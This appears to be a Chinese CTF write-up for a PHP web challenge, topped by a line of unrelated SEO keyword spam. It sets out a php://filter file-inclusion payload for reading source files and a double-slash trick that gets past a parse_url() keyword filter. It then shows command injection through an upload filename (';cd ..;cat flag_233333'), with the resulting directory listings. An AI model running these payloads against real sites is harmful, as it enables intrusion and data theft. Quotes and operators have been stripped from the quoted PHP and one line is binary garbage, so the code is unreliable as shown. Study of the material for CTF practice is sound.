南阳网站建设南阳,营销策划公司名称大全,网站后台默认用户名,网址生成二维码在线题倒是不难#xff0c;但是实在是恶心到了。 上来就是登录框#xff0c;页面源代码也没什么特别的。寻思抓包看一下#xff0c;数据包直接返回了sql查询语句。到以为是sql注入的题目#xff0c;直到我看到了单引号被转义。。。挺抽象#xff0c;似乎sql语句过滤很严格。又…题倒是不难但是实在是恶心到了。 上来就是登录框页面源代码也没什么特别的。寻思抓包看一下数据包直接返回了sql查询语句。到以为是sql注入的题目直到我看到了单引号被转义。。。挺抽象似乎sql语句过滤很严格。又扫描后台发现register.php。
admin注册不了应该有限制。 源代码还是没什么特别。但url还是很明显 猜测是否存在文件包含。掏出伪协议 这题的源码应该会自动补齐后缀
/user.php?pagephp://filter/readconvert.base64-encode/resourceindex
?php
require_once function.php;
if(isset($_SESSION[login] )){Header(Location: user.php?pageinfo);
}
else{include templates/index.html;
}
? 可给我高兴坏了以为数据包里的session可以搞事情可弄了半天啥也没有。。。 那就继续都user.php
?php
require_once(function.php);
if( !isset( $_SESSION[user] )){Header(Location: index.php);}
if($_SESSION[isadmin] 1){$oper_you_can_do $OPERATE_admin;
}else{$oper_you_can_do $OPERATE;
}
//die($_SESSION[isadmin]);
if($_SESSION[isadmin] 1){if(!isset($_GET[page]) || $_GET[page] ){$page info;}else {$page $_GET[page];}
}
else{if(!isset($_GET[page])|| $_GET[page] ){$page guest;}else {$page $_GET[page];if($page info){
// echo(scriptalert(no premission to visit info, only admin can, you are guest)/script);Header(Location: user.php?pageguest);}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
// $page info;
//}
include $page.php;
? session还是搞不了。info不能直接读取看看function.php吧
?php
session_start();
require_once config.php;
function Hacker()
{Header(Location: hacker.php);die();
}function filter_directory()
{$keywords [flag,manage,ffffllllaaaaggg];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password;$whitelist 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),_*-;for ($i 0; $i strlen($string); $i) {if (strpos($whitelist, $string[$i]) false) {Hacker();}}if (preg_match(/$blacklist/is, $string)) {Hacker();}if (is_string($string)) {return $mysqli-real_escape_string($string);} else {return ;}
}function sql_query($sql_query)
{global $mysqli;$res $mysqli-query($sql_query);return $res;
}function login($user, $pass)
{$user Filter($user);$pass md5($pass);$sql select * from albert_users where username_which_you_do_not_know $user and password_which_you_do_not_know_too $pass;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();if ($res-num_rows) {$data $res-fetch_array();$_SESSION[user] $data[username_which_you_do_not_know];$_SESSION[login] 1;$_SESSION[isadmin] $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql update albert_users set isadmin_which_you_do_not_know_too_too $level where username_which_you_do_not_know$user ;echo $sql;$res sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user Filter($user);$pass md5($pass);$sql insert into albert_users(username_which_you_do_not_know,password_which_you_do_not_know_too,isadmin_which_you_do_not_know_too_too) VALUES ($user,$pass,0);$res sql_query($sql);return $mysqli-insert_id;
}function logout()
{session_destroy();Header(Location: index.php);
}?重点代码在这
$keywords [flag,manage,ffffllllaaaaggg,info];$uri parse_url($_SERVER[REQUEST_URI]);parse_str($uri[query], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
过滤了几个关键的单词 。这里重点要绕过parse_url()函数
此函数返回一个关联数组包含现有 URL 的各种组成部分。如果缺少了其中的某一个则不会为这个组成部分创建数组项。多加了一个/ 导致 严重不合格的 URLparse_url() 返回FALSE 这个是通用的绕过方法
//user.php?pagephp://filter/readconvert.base64-encode/resourceffffllllaaaaggg
?php
if (FLAG_SIG ! 1){die(you can not visit it directly);
}else {echo you can find sth in m4aaannngggeee;
}
? 哎继续包含
//m4aaannngggeee?php
if (FLAG_SIG ! 1){die(you can not visit it directly);
}
include templates/upload.html;? upload.html。终于可以拿shell了吗。访问这个路径
http://146803fe-f52f-41f6-b815-0da93cf9caed.node5.buuoj.cn:81/templates/upload.html 我都准备抓包了最后发现上传是假的 先拿去读以下源码
//upllloadddd.php
?php
$allowtype array(gif,png,jpg);
$size 10000000;
$path ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/;
$filename $_FILES[file][name];
if(is_uploaded_file($_FILES[file][tmp_name])){if(!move_uploaded_file($_FILES[file][tmp_name],$path.$filename)){die(error:can not move);}
}else{die(error:not an upload file锛?);
}
$newfile $path.$filename;
echo file upload successbr /;
echo $filename;
$picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 -w 0);
echo img srcdata:image/png;base64,.$picdata./img;
if($_FILES[file][error]0){unlink($newfile);die(Upload file error: );
}
$ext array_pop(explode(.,$_FILES[file][name]));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
? 抓数据包的时候发现要访问/upllloadddd.php问呢才行
绷不住了。抓包吧
如果不认真看源码就去上传图片码或者php文件那你就g了以为它给你的上传路径下边也没有文件。 它已经给过提示了我是傻子QAQ。重点在这
$picdata system(cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/.$filename. | base64 - 上传的文件名可以命令执行 payload: ;ls 上述图片解码后就是这些
assert
back_assert
config.php
error_parameter.php
ffffllllaaaaggg.php
function.php
guest.php
hacker.php
hacker2.php
index.php
info.php
login.php
logo.png
m4aaannngggeee.php
register.php
templates
updateadmin.php
updateadmin.php~
updateadmin233333333333333.php
upllloadddd.php
upload_b3bb2cfed6371dfeb2db1dbcceb124d3
user.php
菌)狕受Z弹?帙冬{?assert
back_assert
config.php
error_parameter.php
ffffllllaaaaggg.php
function.php
guest.php
hacker.php
hacker2.php
index.php
info.php
login.php
logo.png
m4aaannngggeee.php
register.php
templates
updateadmin.php
updateadmin.php~
updateadmin233333333333333.php
upllloadddd.php
upload_b3bb2cfed6371dfeb2db1dbcceb124d3
user.php 难以想象作者的状态。还过滤了/。
payload: ;cd ..;ls
app
bin
boot
data
dev
etc
flag_233333
home
lib
lib64
media
mnt
opt
proc
root
run
run.sh
sbin
srv
sys
tmp
usr
var看见flag了。
payload: ;cd ..;cat flag_233333 也算是拿到了 。题到是不难就是有点怪怪的
